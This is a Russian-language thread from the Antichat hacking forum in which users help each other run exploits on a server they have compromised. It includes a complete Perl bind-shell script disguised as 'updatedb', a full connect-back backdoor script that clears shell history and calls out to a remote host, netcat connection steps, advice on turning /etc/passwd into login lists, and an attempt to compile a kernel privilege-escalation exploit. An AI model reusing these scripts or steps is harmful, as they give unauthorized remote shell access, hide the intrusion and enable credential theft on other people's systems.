ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #31  
Старый 26.04.2007, 16:53
Аватар для XENON4IK
XENON4IK
Участник форума
Регистрация: 22.04.2007
Сообщений: 135
Провел на форуме:
637994

Репутация: 203
Отправить сообщение для XENON4IK с помощью ICQ
По умолчанию

У меня вот тут возник вопрос...
Есть у меня шелл... залил под фрюху туда эксплойт... А как его запутить то? Сорри за ламерский вопрос=))
 
Ответить с цитированием

  #32  
Старый 26.04.2007, 16:59
Аватар для zl0ba
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

Цитата:
Сообщение от XENON4IK  
У меня вот тут возник вопрос...
Есть у меня шелл... залил под фрюху туда эксплойт... А как его запутить то? Сорри за ламерский вопрос=))
Надо пробиндить машину, законектиться с помощью
netcat и скомпилить сплойт.

bind.pl:

Код:
#!/usr/bin/perl

$port = 32767; 
$port = $ARGV[0] if $ARGV[0];
exit if fork;
$0 = "updatedb" . " " x100;
$SIG{CHLD} = 'IGNORE';
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in($port, INADDR_ANY));
listen(S, 50);
while(1)
{
	accept(X, S);
	unless(fork)
	{
		open STDIN, "<&X";
		open STDOUT, ">&X";
		open STDERR, ">&X";
		close X;
		exec("/bin/sh");
	}
	close X;
}
С помощью шелла выполняем команду : perl bind.pl в дире /tmp

конектимся через netcat : 111.111.111.111 3432
 
Ответить с цитированием

  #33  
Старый 26.04.2007, 17:04
Аватар для XENON4IK
XENON4IK
Участник форума
Регистрация: 22.04.2007
Сообщений: 135
Провел на форуме:
637994

Репутация: 203
Отправить сообщение для XENON4IK с помощью ICQ
По умолчанию

Спасибо ща буду пробывать.
 
Ответить с цитированием

  #34  
Старый 26.04.2007, 17:22
Аватар для XENON4IK
XENON4IK
Участник форума
Регистрация: 22.04.2007
Сообщений: 135
Провел на форуме:
637994

Репутация: 203
Отправить сообщение для XENON4IK с помощью ICQ
По умолчанию

Хммм почему то не биндиться машина... или забиндилась. Можно какнить проверить? а то он уже пол часа грузится...
Во ещё там нашёл такой файлик=)
bd.pl
Код:
#!/usr/bin/perl
use IO::Socket;
#cONNECT BACKDOOR EDITED BY XORON          
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== WElcome Obormot ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell is redy ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor Shell EDITED BY XORON TURKЭSH HACKER ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(xoron) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system    = '/bin/sh';
$ARGC=@ARGV; 
print "--== ConnectBack Backdoor Shell EDITED BY XORON TURKЭSH HACKER ==-- \n\n"; 
if ($ARGC!=2) { 
  print "Usage: $0 [Host] [Port] \n\n"; 
  die "Ex: $0 127.0.0.1 2121 \n"; 
} 
use Socket; 
use FileHandle; 
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; 
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; 
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n"; 
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush(); 
open(STDIN, ">&SOCKET"); 
open(STDOUT,">&SOCKET"); 
open(STDERR,">&SOCKET"); 
print "--== ConnectBack Backdoor Shell EDITED BY XORON TURKЭSH HACKER ==--  \n\n"; 
system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo;
echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- "); 
system($system);
#EOF

Последний раз редактировалось XENON4IK; 26.04.2007 в 17:30..
 
Ответить с цитированием

  #35  
Старый 26.04.2007, 18:43
Аватар для Xszz
Xszz
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223

Репутация: 91
Отправить сообщение для Xszz с помощью ICQ
По умолчанию

Немного непонял про Парсер , как им пользоваться .
какие параметры задавать ?
Спасибо.
 
Ответить с цитированием

  #36  
Старый 27.04.2007, 08:13
Аватар для zl0ba
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

2XENON4IK
Можно проверить командой ps в веб шелле, если конечно она доступна.
Мне кажеться сдесь был хекер, файл bd.pl это бекдор.
2Xszz
perl parser.pl ftppass.txt out

ftppass.txt - есть тот файл с etc/passwd
out - отпарсированый файл с login:login
--
также есть траблы с актив перлом под винду , почему то иногда не пашет. Без проблем можно отпарсировать в любой *nix или в Cygwin.

Последний раз редактировалось zl0ba; 27.04.2007 в 08:34..
 
Ответить с цитированием

  #37  
Старый 27.04.2007, 08:26
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Тема превратилась в "задай вопрос - получи ответ"...
 
Ответить с цитированием

  #38  
Старый 27.04.2007, 11:41
Аватар для XENON4IK
XENON4IK
Участник форума
Регистрация: 22.04.2007
Сообщений: 135
Провел на форуме:
637994

Репутация: 203
Отправить сообщение для XENON4IK с помощью ICQ
По умолчанию

Не я понял что там был кул хацкер из турции=))) Проблему решил. подконнектился через неткэт. Пытался откомпилить сплоит.. но чёто не так или просто сплойт не пашет..
компилил так:
Код:
gcc -o3 -static -(чёто)-(чёто)-pointer kernel.c -o kernel
Причём между -(чёто)-(чёто)-pointer нету пробелов...
Это видел в каком то видео... сорри что не помню что там было точно написано. Но не суть. Вроде он компилится и создаёт этот файл kernel.
Я его запускаю он мне типо пишет создал папку /tmp/sh а реально он её не создаёт...
Это в чём проблема в компиляции или просто ядро пропатчено?
Ядро вроде уязвимое по версии...
Домой прийду отпишусь поподробнее...
 
Ответить с цитированием

  #39  
Старый 27.04.2007, 15:57
Аватар для zl0ba
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

Цитата:
Сообщение от xenon4ik  
Ядро вроде уязвимое по версии...
Домой прийду отпишусь поподробнее...
Если ядро патченое, сдесь кроме приват сплоинтов не чё не поможет =\, смотрим версии уязвимых демонов.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
Books PSalm69 Избранное 248 27.10.2009 04:52
На PHP, как на "Новые ворота"... Mertvii-Listopad Чужие Статьи 7 18.09.2006 12:42
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ